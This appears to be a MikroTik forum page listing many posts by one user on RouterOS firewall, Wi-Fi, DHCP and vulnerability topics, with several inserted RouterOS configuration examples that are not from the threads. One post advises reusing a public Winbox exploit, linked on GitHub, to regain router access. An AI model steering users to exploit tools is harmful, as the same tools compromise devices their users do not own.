Community discussions

Search found 883 matches

by R1CH
Mon Apr 01, 2019 2:33 pm
Forum: General
Topic: ros rb4011 2.4g can't be connected by 4 devices?
Replies: 6
Views: 443

Re: ros rb4011 2.4g can't be connected by 4 devices?

With 20 virtual APs you are probably destroying the channel with beacons. Make sure to set g/n only or change your data rates.

https://r1ch.net/blog/wifi-beacon-pollution
by R1CH
Sat Mar 30, 2019 3:37 pm
Forum: General
Topic: Block DropBox with firewall
Replies: 2
Views: 442

Re: Block DropBox with firewall

As it's HTTPS you need to block via DNS or IP range, not recommended. If bandwidth consumption is a concern then use queues or data limits for your users.
by R1CH
Sat Mar 30, 2019 3:28 pm
Forum: General
Topic: how to close all UDP ports on mikrotik?
Replies: 3
Views: 464

Re: how to close all UDP ports on mikrotik?

Add a rule to the FORWARD chain, protocol UDP, action DROP. Note that this will break a lot of things that rely on UDP; a better solution is to fix whichever client behind your router is infected and trying to scan the internet.
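As an added example (not configuration from the post or the thread), the rule exactly as described, alongside a narrower option that surfaces the scanning host instead of breaking UDP for everyone. The interface lists LAN and WAN are assumed to exist as in the RouterOS default configuration; the rate and burst values are assumptions to tune.

```routeros
# Option A: the rule as described in the reply. Drops every forwarded UDP packet, which
# also kills DNS, NTP, VoIP, QUIC and most games for every client behind the router.
/ip firewall filter
add chain=forward protocol=udp action=drop comment="blunt: drop ALL forwarded UDP"

# Option B (use instead of A, not together): allow each LAN host a normal rate of new
# outbound UDP flows, log the source address of anything above that rate, and drop only
# the excess. The infected client then shows up in /log by IP while everything else works.
/ip firewall filter
add chain=forward protocol=udp connection-state=new in-interface-list=LAN out-interface-list=WAN dst-limit=20/1s,50,src-address/1m action=accept comment="normal per-host rate of new outbound UDP flows (assumed values)"
add chain=forward protocol=udp connection-state=new in-interface-list=LAN out-interface-list=WAN action=log log-prefix="udp-scan" comment="above the rate: log the offending LAN host"
add chain=forward protocol=udp connection-state=new in-interface-list=LAN out-interface-list=WAN action=drop comment="...and drop only the excess"

# Which host is scanning? Read the prefixed entries back out of the log.
/log print where message~"udp-scan"
```

Both options must sit above any existing rule that accepts traffic from the LAN (use `place-before=` when adding to a populated chain), otherwise they never match. Option B rate-limits new flows per source address, so a host doing a port sweep trips it quickly while a normal client stays under the limit.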
by R1CH
Fri Mar 29, 2019 2:07 am
Forum: General
Topic: Running IPv6 on Mikrotik? You're out of business in 12 days time
Replies: 32
Views: 15170

Re: Running IPv6 on Mikrotik? You're out of business in 12 days time

"why r u being so disruptive and trying to break mikrotik?" That's what security researchers do. Any internet connected device and protocol is studied for such bugs, and finding and fixing them makes everyone safer. Be happy that he found it before the bad guys did. Imagine someone constantly crashin...
by R1CH
Thu Mar 28, 2019 2:24 pm
Forum: General
Topic: Running IPv6 on Mikrotik? You're out of business in 12 days time
Replies: 32
Views: 15170

Re: Running IPv6 on Mikrotik? You're out of business in 12 days time

Somehow this is the first I've heard of this and I'm very concerned as I have a modern network that includes IPv6. You're saying Mikrotik have known about this for 50 weeks and it hasn't been fixed?!? What is going on over there?! This is a completely unacceptable response for a security vulnerabili...
by R1CH
Tue Mar 26, 2019 5:32 pm
Forum: General
Topic: wAP AC reaching out to 159.148.172.226:80 every hour
Replies: 10
Views: 706

Re: wAP AC reaching out to 159.148.172.226:80 every hour

First thing I checked, definitely disabled.
by R1CH
Tue Mar 26, 2019 2:39 pm
Forum: General
Topic: Question about SSL certificate
Replies: 3
Views: 381

Re: Question about SSL certificate

by R1CH
Tue Mar 26, 2019 2:35 pm
Forum: General
Topic: wAP AC reaching out to 159.148.172.226:80 every hour
Replies: 10
Views: 706

Re: wAP AC reaching out to 159.148.172.226:80 every hour

The log screenshot is from my core router, the AP has forwarding disabled since it bridges onto the appropriate VLANs so it can't be coming from a client.
by R1CH
Tue Mar 26, 2019 1:51 pm
Forum: General
Topic: wAP AC reaching out to 159.148.172.226:80 every hour
Replies: 10
Views: 706

Re: wAP AC reaching out to 159.148.172.226:80 every hour

Why would it be doing this by itself? I have no auto upgrade configured, no one is logged in and running check-for-updates. None of the other devices with the same config are doing this.
by R1CH
Tue Mar 26, 2019 1:52 am
Forum: General
Topic: lost password after exploit
Replies: 3
Views: 370

Re: lost password after exploit

If it isn't blocked just use the same exploit to gain access. https://github.com/BigNerd95/WinboxExploit
by R1CH
Tue Mar 26, 2019 1:51 am
Forum: General
Topic: Local devices on DHCP are in DNS cache as 0.0.0.0
Replies: 2
Views: 230

Re: Local devices on DHCP are in DNS cache as 0.0.0.0

DHCP does not register DNS. You need to script this if you want it.

https://wiki.mikrotik.com/wiki/Setting_ ... DHCP_lease
by R1CH
Tue Mar 26, 2019 1:50 am
Forum: General
Topic: wAP AC reaching out to 159.148.172.226:80 every hour
Replies: 10
Views: 706

Re: wAP AC reaching out to 159.148.172.226:80 every hour

Nope. Very basic config, bridged wlans, some virtual APs, no CAPSMAN. Can't think what else would be causing it.
by R1CH
Mon Mar 25, 2019 6:01 pm
Forum: General
Topic: wAP AC reaching out to 159.148.172.226:80 every hour
Replies: 10
Views: 706

wAP AC reaching out to 159.148.172.226:80 every hour

Trying to figure out why this is happening as of 6.44, also tried 6.44.1. I upgraded all my wAP AC units (5), however only one of them is displaying this behavior. https://i.imgur.com/pE3W2M2.png DDNS is disabled, Update Time is disabled, TZ auto detect is disabled. No scripts, scheduler, etc. What else...
by R1CH
Mon Mar 25, 2019 4:18 pm
Forum: General
Topic: dns cache problam
Replies: 2
Views: 224

Re: dns cache problam

Those are negative entries, the random names are normal and used by captive portal detection of various OSes. Nothing in that should affect WhatsApp, the problem may be elsewhere.
by R1CH
Sat Mar 23, 2019 8:01 pm
Forum: Wireless Networking
Topic: Multiple SSID’s and DHCP [SOLVED]
Replies: 3
Views: 345

Re: Multiple SSID’s and DHCP [SOLVED]

Bridge should be fine, just make sure DHCP server is set up to run on the bridge instead of one of the interfaces.
by R1CH
Fri Mar 22, 2019 5:31 pm
Forum: General
Topic: Help to config roming wireless
Replies: 4
Views: 377

Re: Help to config roming wireless

The best thing you can do with Mikrotik is set up all APs with the same SSID / authentication, ensure they're all in the same broadcast domain and ensure your DHCP server is very fast at handling requests / renews (eg no pinging for 2 seconds before giving a lease). Unfortunately RouterOS lacks support f...
by R1CH
Fri Mar 22, 2019 1:33 pm
Forum: Wireless Networking
Topic: 256QAM and AC provisioning on 2,4GHz
Replies: 2
Views: 379

Re: 256QAM and AC provisioning on 2,4GHz

Sounds like you're asking for 802.11ax...
by R1CH
Fri Mar 22, 2019 12:17 pm
Forum: General
Topic: Question about SSL certificate
Replies: 3
Views: 381

Re: Question about SSL certificate

Yes, the hotspot FQDN must match the certificate. Do note that this only provides security to the hotspot page itself, it will not help in redirecting HTTPS pages to the hotspot.
by R1CH
Thu Mar 21, 2019 6:35 pm
Forum: General
Topic: Feature Request: Separate the firmware(bootloader) and routeros version number
Replies: 8
Views: 496

Re: Feature Request: Separate the firmware(bootloader) and routeros version number

"You always need to update RouterBOOT and keep it the same version as RouterOS" The problem is RouterBOOT often has no changes between RouterOS versions, but we have no way of knowing since the version is incremented regardless. This involves needless reboots and additional wear on the small flash re...
by R1CH
Wed Mar 20, 2019 9:36 pm
Forum: RouterBOARD hardware
Topic: hAP ac and Verizon Gigabit
Replies: 4
Views: 393

Re: hAP ac and Verizon Gigabit

Make sure fasttrack is active, hAP AC is unlikely to be able to do 1gbps otherwise.
by R1CH
Tue Mar 19, 2019 1:26 pm
Forum: General
Topic: HOTSPOT login https error
Replies: 11
Views: 804

Re: HOTSPOT login https error

You don't start, since that is impossible. The security of HTTPS negates attempts to intercept such requests, unless you want to teach your users to blindly ignore serious security errors.
by R1CH
Tue Mar 19, 2019 1:24 pm
Forum: General
Topic: CPU consumption by Horizon?
Replies: 2
Views: 498

Re: CPU consumption by Horizon?

Horizon will disable hardware offload according to wiki.
by R1CH
Mon Mar 18, 2019 4:22 pm
Forum: General
Topic: Putty updated to 0.71
Replies: 12
Views: 675

Re: Putty updated to 0.71

Which is my point. Post it in the phucking putty forum. Do you want me to start effing posting everytime there is a windows update, a linux update, a macos update, an avast update, etc etc etc............ I might as well post everytime I pop a zit, and pluck a nose hair. ;-) It's been almost two ye...
by R1CH
Mon Mar 18, 2019 1:51 am
Forum: Wireless Networking
Topic: blog.mikrotik.com: 802.11ay?
Replies: 3
Views: 504

Re: blog.mikrotik.com: 802.11ay?

Right after 802.11ax...
by R1CH
Mon Mar 18, 2019 1:49 am
Forum: Announcements
Topic: v6.44.1 [stable] is released!
Replies: 86
Views: 18022

Re: v6.44.1 [stable] is released!

Do you really need all those packages? You are likely out of space since the device only has 16MB flash.
by R1CH
Sun Mar 17, 2019 11:54 pm
Forum: General
Topic: Redirect All SSL Pages to one page
Replies: 4
Views: 298

Re: Redirect All SSL Pages to one page

Don't set up your network in a way that intercepts all HTTPS requests and encourages users to bypass SSL errors. This is teaching users very dangerous practices, when their connection actually does get MITMed by a network attacker or compromised DNS, website, etc, then they will happily ignore the e...
by R1CH
Fri Mar 15, 2019 6:52 pm
Forum: General
Topic: Redirect All SSL Pages to one page
Replies: 4
Views: 298

Re: Redirect All SSL Pages to one page

Not possible, HTTPS is secure so you can't intercept it.
by R1CH
Fri Mar 15, 2019 6:51 pm
Forum: Announcements
Topic: v6.44.1 [stable] is released!
Replies: 86
Views: 18022

Re: v6.44.1 [stable] is released!

I didn't see any difference in behavior, it behaves as if it's disabled regardless of the checkbox state.
by R1CH
Fri Mar 15, 2019 3:56 pm
Forum: Announcements
Topic: v6.44.1 [stable] is released!
Replies: 86
Views: 18022

Re: v6.44.1 [stable] is released!

This doesn't affect users only during an upgrade, the default RouterOS conntrack timeouts are quite low and especially with the bug with tcp unacked timer, it's easy to get day-to-day TCP connections affected by this.
by R1CH
Fri Mar 15, 2019 3:42 pm
Forum: Announcements
Topic: v6.44.1 [stable] is released!
Replies: 86
Views: 18022

Re: v6.44.1 [stable] is released!

I can confirm the "Loose TCP Tracking" is completely broken in this release (and perhaps 6.44, didn't test it extensively). Previously established connections are treated as INVALID regardless of the setting.
by R1CH
Fri Mar 15, 2019 3:27 pm
Forum: General
Topic: HOTSPOT login https error
Replies: 11
Views: 804

Re: HOTSPOT login https error

Just make sure nothing is in the walled garden. As long as the user is using a modern browser or phone, they should get the prompt for the portal.
by R1CH
Thu Mar 14, 2019 9:11 pm
Forum: General
Topic: HOTSPOT login https error
Replies: 11
Views: 804

Re: HOTSPOT login https error

Make sure that you aren't allowing any sites in the hotspot before user auth, if you allow connectivity to Google / Apple / etc, the browser will think it has internet and will not trigger the captive portal. Any modern browser otherwise will notice the connection test is failing and prompt the user...
by R1CH
Tue Mar 12, 2019 7:52 pm
Forum: General
Topic: Connection tracking issue
Replies: 2
Views: 347

Re: Connection tracking issue

If you're seeing untranslated packets make it onto the network then you must have modified the default config, as this is considered "invalid" by netfilter and the defconf rules drop it.
by R1CH
Sun Mar 10, 2019 7:47 pm
Forum: General
Topic: Is there any way to do HTTP and HTTPS traffic shaping based on categories?
Replies: 10
Views: 452

Re: Is there any way to do HTTP and HTTPS traffic shaping based on categories?

You can use the tls host rule which works with SNI.
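An added example of the SNI-based approach mentioned above (not configuration from the thread): a mangle pair that marks the connection on the ClientHello and a queue that shapes the marked packets. The host pattern, the queue target `bridge` and the 2M limit are assumptions.

```routeros
# tls-host only matches on the packet that carries the TLS ClientHello (the one place the
# server name is in cleartext), so mark the connection once and let the mark do the rest.
/ip firewall mangle
add chain=forward protocol=tcp dst-port=443 connection-mark=no-mark tls-host="*.example-video.com" action=mark-connection new-connection-mark=video-conn passthrough=yes comment="SNI match on the ClientHello (assumed host pattern)"
# Every packet of the marked connection, both directions, gets the packet mark the queue uses.
# passthrough=yes on the rule above lets the ClientHello packet itself reach this rule too.
add chain=forward connection-mark=video-conn action=mark-packet new-packet-mark=video passthrough=no comment="inherit mark from the connection"

# Shape the marked packets. target is the LAN-side interface (assumed name "bridge").
/queue simple
add name=video-shaping target=bridge packet-marks=video max-limit=2M/2M comment="shape SNI-matched HTTPS"

# Verify the rules are actually hitting: the counters should climb while a client browses the site.
/ip firewall mangle print stats
```

Caveats a practitioner should keep in mind: this matches only TCP/443 with a cleartext SNI. QUIC (UDP 443), Encrypted ClientHello, and a client that deliberately sends a false SNI all escape it, so treat it as a shaping heuristic rather than an enforcement control.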
by R1CH
Sat Mar 09, 2019 2:48 pm
Forum: RouterBOARD hardware
Topic: MUM Europe 2019: new hardware
Replies: 61
Views: 11217

Re: MUM Europe 2019: new hardware

Wish there were some announcements about 802.11ax. I guess until ROS v7 is released the kernel is too old to support such drivers anyway.
by R1CH
Fri Mar 08, 2019 5:14 pm
Forum: General
Topic: hEX S shows activity on disabled SFP port without a link
Replies: 6
Views: 324

Re: hEX S shows activity on disabled SFP port without a link

I enabled the interface and the problem stopped. Very weird behavior. I don't plan on using the SFP port so this doesn't seem to cause any issues.
by R1CH
Thu Mar 07, 2019 7:44 pm
Forum: General
Topic: hEX S shows activity on disabled SFP port without a link
Replies: 6
Views: 324

Re: hEX S shows activity on disabled SFP port without a link

This is occurring with 6.44.
by R1CH
Thu Mar 07, 2019 6:26 pm
Forum: General
Topic: hEX S shows activity on disabled SFP port without a link
Replies: 6
Views: 324

hEX S shows activity on disabled SFP port without a link

How is this even possible?!

Image

ether2-5 and sfp1 are bridged. The traffic levels seem to match around what ether2 is doing.
by R1CH
Tue Mar 05, 2019 6:12 pm
Forum: General
Topic: Cant resolve mynetname.net when DNSSEC validation is enabled
Replies: 2
Views: 272

Re: Cant resolve mynetname.net when DNSSEC validation is enabled

Seems to work OK here behind a DNSSEC-validating PowerDNS recursor.

No TCP support though is a problem that Mikrotik need to fix.
by R1CH
Sat Mar 02, 2019 3:04 am
Forum: Announcements
Topic: v6.44 [stable] is released!
Replies: 219
Views: 35274

Re: v6.44 [stable] is released!

"https-redirect is not working" You can't redirect HTTPS - the security provided by HTTPS means that unless you control the client devices and can install custom root certs, certificate validation will fail and users will see security errors. Mikrotik of all people should know this... what does this ...
by R1CH
Wed Feb 27, 2019 4:22 pm
Forum: General
Topic: RouterOS and 161/udp
Replies: 1
Views: 353

Re: RouterOS and 161/udp

You aren't filtering any other UDP ports, so they are responded to with an ICMP port unreachable, confirming the port is closed. Since UDP is connectionless, unless you speak the protocol there's no way to distinguish between an open port and a filtered port. I recommend you update your firewall to ...
by R1CH
Fri Feb 22, 2019 9:23 pm
Forum: General
Topic: Security issue when Winbox exposed
Replies: 68
Views: 5641

Re: Security issue when Winbox exposed

Unicode in the updated changelog, which winbox can't handle.

Image
by R1CH
Fri Feb 22, 2019 3:25 pm
Forum: General
Topic: Security issue when Winbox exposed
Replies: 68
Views: 5641

Re: Security issue when Winbox exposed

"I think it's great that Zerodium started a bug bounty program for Mikrotik. It's not like the bad guys don't know, they're just providing incentives for full disclosure. So patch early and patch often my friends!" Unfortunately that isn't how it works. Zerodium will pay for Mikrotik exploits and the...
by R1CH
Fri Feb 22, 2019 1:27 am
Forum: Announcements
Topic: v6.43.12 [stable] is released!
Replies: 49
Views: 11964

Re: v6.43.12 [stable] is released!

My CCR1009-7G-1C-1S+ just watchdog timer rebooted after installing this update a few days ago. In over a year of operation never had that happen.
Feb/21/2019 14:46:44 system,error,critical router was rebooted without proper shutdown by watchdog timer
by R1CH
Fri Feb 22, 2019 1:06 am
Forum: General
Topic: Security issue when Winbox exposed
Replies: 68
Views: 5641

Re: Security issue when Winbox exposed

"I see where you are coming from, so I fixed it for ya................." Please try to keep in mind some of us run networks where we can't just take down the router for every RouterOS release. This was clearly not labelled as a security fix, so I personally did not consider it a priority to deploy du...
by R1CH
Thu Feb 21, 2019 6:52 pm
Forum: General
Topic: Security issue when Winbox exposed
Replies: 68
Views: 5641

Re: Security issue when Winbox exposed

Why is this not mentioned as high severity security bug in changelog? Why no mention on security blog? Come on Mikrotik...
by R1CH
Wed Feb 20, 2019 11:56 pm
Forum: General
Topic: Problem with AP RBWAP2ND-BE
Replies: 2
Views: 234

Re: Problem with AP RBWAP2ND-BE

Try a full config reset with the reset button or just netinstall them. The default config on these devices is infuriating!

https://wiki.mikrotik.com/wiki/Manual:Reset_button
by R1CH
Wed Feb 20, 2019 11:44 pm
Forum: Wireless Networking
Topic: Superchannel on ac radios?
Replies: 4
Views: 518

Re: Superchannel on ac radios?

You need the international version if you want unlocked frequencies.
- RB921UAGS-5SHPacT-NM-US (USA) is factory locked for 5170-5250MHz and 5725-5835MHz frequencies. This lock can not be removed.
- RB921UAGS-5SHPacT-NM (International) supports 5150MHz-5875MHz range (Specific frequency range can be l...
by R1CH
Wed Feb 20, 2019 4:39 pm
Forum: General
Topic: Problem with DHCP Mikrotik RB962UIGS-5HACT2HNT
Replies: 11
Views: 584

Re: Problem with DHCP Mikrotik RB962UIGS-5HACT2HNT

Config? Maybe you're blocking important DHCP packets with the firewall.
by R1CH
Mon Feb 18, 2019 1:00 pm
Forum: General
Topic: WireGuard Released !
Replies: 9
Views: 3419

Re: WireGuard Released !

Just because it isn't mainlined doesn't mean it isn't available. I've been using it in production for months via DKMS and I'm very happy with it. There are open source Windows clients available, performance is great and setup is so refreshingly easy compared to something like IPSec. And it's actuall...
by R1CH
Fri Feb 15, 2019 6:16 pm
Forum: Announcements
Topic: v6.44rc [testing] is released!
Replies: 67
Views: 12098

Re: v6.44rc [testing] is released!

You make a good point about reboots creating zombie TCP connections on the nodes, but you are wrong about the DoS mitigation. Setting nf_conntrack_tcp_loose to 0 (not the default) stops false SYN-ACK and ACK packets before they hit the “listen” state lock, thereby allowing conntrack to scale much h...
by R1CH
Fri Feb 15, 2019 5:57 pm
Forum: Announcements
Topic: v6.44rc [testing] is released!
Replies: 67
Views: 12098

Re: v6.44rc [testing] is released!

That setting should have no effect on DoS resistance unless you aren't properly filtering your inbound traffic. It's set to 1 which is the default, for good reason, otherwise any time a router reboots every single active TCP connection would have to time out instead of continuing to work.
by R1CH
Fri Feb 15, 2019 4:21 pm
Forum: Announcements
Topic: v6.44rc [testing] is released!
Replies: 67
Views: 12098

Re: v6.44rc [testing] is released!

Just to clarify,
*) wireless - improved system stability for all ARM devices with wireless;
*) wireless - improved system stability for all MIPSBE devices with 802.11ac wireless;
Does this improve wireless performance or only RouterOS software stability? Also what devices are using AR5212? This is a...
by R1CH
Thu Feb 14, 2019 7:18 pm
Forum: Wireless Networking
Topic: Help Hacker sending deauth packet
Replies: 6
Views: 743

Re: Help Hacker sending deauth packet

These are often accidental, where someone configures an enterprise AP with "rogue AP mitigation" or a similar setting. Check with any businesses nearby or see if a wireless scan picks out any obvious enterprise APs that might be the culprits.
by R1CH
Thu Feb 14, 2019 1:05 pm
Forum: RouterBOARD hardware
Topic: Why people pair UBNT APs with MikroTik routers?
Replies: 55
Views: 29204

Re: Why people pair UBNT APs with MikroTik routers?

Do all people asking for new kernel realize that it would mean dropping support for WHOLE current CCR series since Linux kernel officially dropped support for Tile-Gx CPUs architecture? While I'm not saying Tile-Gx is awesome it'd still mean dropping support for devices that are: 1) still being sol...
by R1CH
Wed Feb 13, 2019 12:58 pm
Forum: Wireless Networking
Topic: cAP ac (Found the bug)
Replies: 1
Views: 404

Re: cAP ac (Found the bug)

Best to create supout and send to support@mikrotik.com.
by R1CH
Wed Feb 13, 2019 12:51 pm
Forum: General
Topic: $100,000 bounty for Mikrotik 0-days
Replies: 1
Views: 599

$100,000 bounty for Mikrotik 0-days

Thought this was interesting... given the number of exploits already found, I have no doubts that this kind of bounty will turn up more that will be sold to governments and criminals and used against Mikrotik networks. Unless there's an unpatched kernel bug, the safest way to protect yourself from u...
by R1CH
Wed Feb 13, 2019 12:41 pm
Forum: General
Topic: Feature request - DNSCrypt support...
Replies: 153
Views: 43744

Re: Feature request - DNSCrypt support...

"Instead of wordless pluses, how about a discussion on TLS vs HTTPS. TLS gives you a specific port and capability to filter and NAT etc. HTTPS gives you more security, but also the inability to catch this traffic as an administrator. More aspects?" Why not both? Although DNS over HTTPS seems to be th...
by R1CH
Tue Feb 12, 2019 1:24 pm
Forum: General
Topic: Config Review - Security Conscience Home User
Replies: 19
Views: 1210

Re: Config Review - Security Conscience Home User

I would ditch all the blacklist / port scan detect / etc stuff. This kind of thing just opens you up to a resource exhaustion attack and can even result in blacklisting legitimate traffic if an attacker has IP spoofing capabilities. The CPUs on these devices are not powerful enough to do this kind of s...
by R1CH
Mon Feb 11, 2019 8:21 pm
Forum: Announcements
Topic: v6.43.12 [stable] is released!
Replies: 49
Views: 11964

Re: v6.43.12 [stable] is released!

*) winbox - improvements in connection handling to router with open winbox service;
Yet another security hole, I presume?
How severe is it?
Sounds like you can DoS the service with half-closed connections or something.
by R1CH
Mon Feb 11, 2019 1:05 pm
Forum: General
Topic: ROS v6.43.x Hacked using same old vulnerability
Replies: 2
Views: 765

Re: ROS v6.43.x Hacked using same old vulnerability

Netinstall the latest version with known clean config and change all passwords. Either you didn't change passwords or you didn't netinstall, so attackers were able to get back onto your device.
by R1CH
Sun Feb 10, 2019 5:08 pm
Forum: General
Topic: problem to block Pubg Game
Replies: 6
Views: 2650

Re: problem to block Pubg Game

Here are the IP ranges used by PUBG. I would not recommend blocking it.

http://ec2-reachability.amazonaws.com/
by R1CH
Fri Feb 08, 2019 12:41 pm
Forum: General
Topic: Bandwidth Test maximum speed
Replies: 4
Views: 599

Re: Bandwidth Test maximum speed

Test through the routers using iperf3, not on the routers.
by R1CH
Thu Feb 07, 2019 11:32 pm
Forum: RouterBOARD hardware
Topic: New routerboot firmware
Replies: 12
Views: 1504

Re: New routerboot firmware

Note that although the firmware version is in sync with the RouterOS version, there are often no changes between versions. It's only worth upgrading if there's a change you need.
by R1CH
Thu Feb 07, 2019 10:22 pm
Forum: General
Topic: Using RouterOS as a local DNS server?
Replies: 3
Views: 404

Re: Using RouterOS as a local DNS server?

Oh my mistake, I misread this question.
by R1CH
Thu Feb 07, 2019 7:29 pm
Forum: General
Topic: Tunnel which generates least traffic when IDLE
Replies: 13
Views: 1101

Re: Tunnel which generates least traffic when IDLE

Wireguard is absolutely silent when there's no traffic and supports changing of endpoint IPs with no connectivity interruption. If you can go a non-Mikrotik route, I've had great success running Wireguard behind the router on a Linux box.
by R1CH
Thu Feb 07, 2019 6:28 pm
Forum: General
Topic: Using RouterOS as a local DNS server?
Replies: 3
Views: 404

Re: Using RouterOS as a local DNS server?

RouterOS doesn't do DHCP DNS registration. You can use a script to add and remove static entries if you need this.

viewtopic.php?t=119469
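An added example of the scripted approach suggested in this reply and in the earlier one about leases appearing in the DNS cache as 0.0.0.0. It is not the script from the linked thread or the wiki page, just one written for this page. Paste the body as the DHCP server's lease script (Winbox: IP > DHCP Server > the server > Lease Script); the local suffix `.lan` and the 5 minute TTL are assumptions.

```routeros
# RouterOS runs the lease script on every bind ($leaseBound = 1) and release
# ($leaseBound = 0) with $leaseActIP, $leaseActMAC and $"lease-hostname" populated.
:local suffix ".lan"
:local tag ("dhcp-" . $leaseActMAC)
:local host $"lease-hostname"

# Always clear the old record for this MAC first: a client may come back with a new
# address or a new hostname, and a stale A record is worse than none.
/ip dns static remove [find comment=$tag]

:if ($leaseBound = 1 && [:len $host] > 0) do={
    # Some clients send no hostname at all; only register a non-empty name.
    # The comment ties the record to the MAC so the release path can find it.
    /ip dns static add name=($host . $suffix) address=$leaseActIP ttl=5m comment=$tag
    :log info ("dhcp-dns: " . $host . $suffix . " -> " . $leaseActIP)
}
```

Check the result with `/ip dns static print where comment~"dhcp-"`. Hostnames are client-supplied and unvalidated: a device can claim any name, including one that collides with a real host on the LAN, so treat these records as a convenience for local lookups and not as an identity.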
by R1CH
Thu Feb 07, 2019 5:37 pm
Forum: RouterBOARD hardware
Topic: RB4011iGS+RM Multi LAN
Replies: 3
Views: 547

Re: RB4011iGS+RM Multi LAN

Delete the default bridge and each port will act like its own LAN.
by R1CH
Thu Feb 07, 2019 4:55 pm
Forum: RouterBOARD hardware
Topic: Why people pair UBNT APs with MikroTik routers?
Replies: 55
Views: 29204

Re: Why people pair UBNT APs with MikroTik routers?

Where does this stand now in 2019 after an entire 2018?
I feel like there's been no real progress since the original hAP AC release. I'm still using wAP AC units when I need a small cheap AP and don't care about latency, but for any big deployment I'm going with UBNT / Ruckus depending on budget.
by R1CH
Thu Feb 07, 2019 4:20 pm
Forum: General
Topic: SMB issues
Replies: 4
Views: 558

Re: SMB issues

Wouldn't it make more sense to keep the modern protocol and disable SMB1 and SMB2? SMB1 is completely removed from Windows 10 these days because it's so old and insecure.
by R1CH
Tue Feb 05, 2019 11:32 pm
Forum: General
Topic: Detect-internet causing internal packet loss
Replies: 10
Views: 1548

Re: Packets being dropped from one host only

How is that a thing?!
by R1CH
Mon Feb 04, 2019 7:16 pm
Forum: Wireless Networking
Topic: 802.11ax [SOLVED]
Replies: 113
Views: 16171

Re: 802.11ax [SOLVED]

You can buy 802.11ax routers on the shelf in retail stores already, yet zero communication from Mikrotik about their timeline... this is rather worrying.
by R1CH
Mon Feb 04, 2019 7:05 pm
Forum: Wireless Networking
Topic: High ping to router HAP AC2
Replies: 33
Views: 2296

Re: High ping to router HAP AC2

This isn't too surprising, Mikrotik wifi is generally poor compared to the competition. Join me in waiting for RouterOS v7 when hopefully we aren't running on drivers and kernel from 2012.
by R1CH
Mon Feb 04, 2019 7:01 pm
Forum: Wireless Networking
Topic: wAP AC for medium densidty outdoor Wireless (Hotspot) project
Replies: 7
Views: 616

Re: wAP AC for medium densidty outdoor Wireless (Hotspot) project

As much as I like Mikrotik, I would avoid their wifi products for this, the features are years behind the competition due to outdated drivers and kernel. Depending on how soon you need to deploy, it might be worth waiting for 802.11ax outdoor products to hit the market. Ruckus might be worth looking...
by R1CH
Fri Feb 01, 2019 4:57 pm
Forum: General
Topic: High number of established connections for one address
Replies: 20
Views: 1298

Re: High number of established connections for one address

TCP session state is based on the endpoints, as long as you pass packets back and forth correctly the session will be fine, there's no state necessary on the router. If you actively break this process by introducing NAT then you should accept that it's your responsibility not to break things for the...
by R1CH
Fri Feb 01, 2019 2:13 pm
Forum: General
Topic: High number of established connections for one address
Replies: 20
Views: 1298

Re: High number of established connections for one address

TCP sessions should be able to last days without a router breaking them. I personally have many active SSH connections that sometimes remain idle for days until a log event is triggered or similar. I would hate to be a user of a network where such connections are broken after just 30 minutes. This o...
by R1CH
Mon Jan 28, 2019 6:27 pm
Forum: Wireless Networking
Topic: Art-Net / UDP port 6454 over WIFI
Replies: 9
Views: 605

Re: Art-Net / UDP port 6454 over WIFI

For broadcast traffic, look into the multicast buffering / helper and group key update interval. That said, Mikrotik generally has worse WiFi than Ubiquiti due to their outdated kernel / drivers. A modern off-the-shelf router might perform better.
by R1CH
Sun Jan 27, 2019 3:20 pm
Forum: General
Topic: Mikrotek RB750GR3 support DES?
Replies: 2
Views: 409

Re: Mikrotek RB750GR3 support DES?

Why do you want to use obsolete algorithms? Both DES and MD5 are proven insecure, you should not be using them anywhere in your network.
by R1CH
Fri Jan 25, 2019 1:06 am
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 6091

Re: 6.43.8 vulnerability or hack?

If you are talking about malware, then : "Simply upgrading RouterOS software deletes the malware, any other 3rd party files and closes the vulnerability" With old versions having root exploits then it's entirely possible for the malware to protect itself and persist after an upgrade. Any compromise...
by R1CH
Fri Jan 25, 2019 12:15 am
Forum: Wireless Networking
Topic: Turn down Tx power
Replies: 20
Views: 1206

Re: Turn down Tx power

1) If the APs are on different channels then they won't be affected by each other, but keep in mind there is always risk of overlap (especially prevalent in 2.4 GHz with only 3 non-overlapping channels).
2) Correct, N also has a 6mbps minimum so it makes no difference.
3) Not possible yet, I posted ...
by R1CH
Thu Jan 24, 2019 11:21 pm
Forum: Wireless Networking
Topic: Turn down Tx power
Replies: 20
Views: 1206

Re: Turn down Tx power

Beacons must be sent at the lowest speed the AP supports, with 802.11b this is 1mbps and a few APs nearby can take up a significant amount of channel bandwidth with just beacons. G/N only mitigates this significantly by mandating 6mbps minimum. I wrote about this in more detail on my blog, https://r...
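An added example of the rate change this post and the earlier RB4011 reply about 20 virtual APs both recommend; it is not configuration from either thread. The interface name `wlan1` is the RouterOS default and the only assumption.

```routeros
# Weak setting: b/g/n keeps the 802.11b rates enabled, so beacons and every other
# basic-rate frame go out at 1 Mbps on each SSID the radio carries.
/interface wireless set [find default-name=wlan1] band=2ghz-b/g/n

# Corrected: g/n only, so the lowest rate the AP ever uses is 6 Mbps. Every virtual AP
# rides on this master radio, so the one setting covers all of its SSIDs.
/interface wireless set [find default-name=wlan1] band=2ghz-g/n basic-rates-a/g=6Mbps

# How many beacon streams is this radio really sending? Each virtual AP adds its own
# beacon roughly every 100 ms on top of the master's.
/interface wireless print where master-interface=wlan1
```

The trade-off is that 802.11b-only clients can no longer associate; if one must be supported, keep it on a separate radio rather than paying the 1 Mbps beacon cost on every SSID.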
by R1CH
Thu Jan 24, 2019 7:27 pm
Forum: General
Topic: New connection but not SYN
Replies: 8
Views: 519

Re: New connection but not SYN

This is normal "background traffic" - a client behind your router closed a connection to a server (FIN / RST) but the packet was lost in transit. The server has no idea the connection is closed, but because your router saw the outgoing FIN / RST, it removed the conntrack entry. So any packets coming...
by R1CH
Thu Jan 24, 2019 7:00 pm
Forum: General
Topic: 6.43.8 vulnerability or hack?
Replies: 31
Views: 6091

Re: 6.43.8 vulnerability

"You should setup VPN instead like PPTP, OVPN. etc. much safer" This is just as unsafe (if not worse) as opening Winbox. PPTP, OpenVPN, IPsec etc are all custom Mikrotik implementations of protocols just like Winbox, except with much more complexity. I have no doubts serious security flaws exist in th...
by R1CH
Thu Jan 24, 2019 6:58 pm
Forum: General
Topic: Mikrotik Syn Cookies failed? [SOLVED]
Replies: 2
Views: 329

Re: Mikrotik Syn Cookies failed? [SOLVED]

